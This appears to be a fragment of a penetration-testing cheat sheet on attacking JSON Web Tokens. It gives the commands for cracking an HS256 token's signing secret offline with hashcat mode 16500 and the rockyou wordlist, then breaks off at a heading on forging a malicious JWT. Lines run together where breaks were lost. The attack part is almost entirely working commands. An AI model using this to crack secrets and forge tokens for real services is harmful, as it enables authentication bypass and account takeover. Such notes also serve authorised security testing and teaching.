Attacking the Signing Secret
Workflow:
echo -n eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ...wtNnrIMwvHeSZf0eB0 > jwt.txthashcat -m 16500 jwt.txt /path/to/wordlist.txt
# For example, most common: /opt/SecLists/Passwords/Leaked-Databases/rockyou.txthashcat -m 16500 jwt.txt /path/to/wordlist.txt --show
# Output will be in form: <jwt>:<cracked_secret>Forging a Malicious JWT
Last updated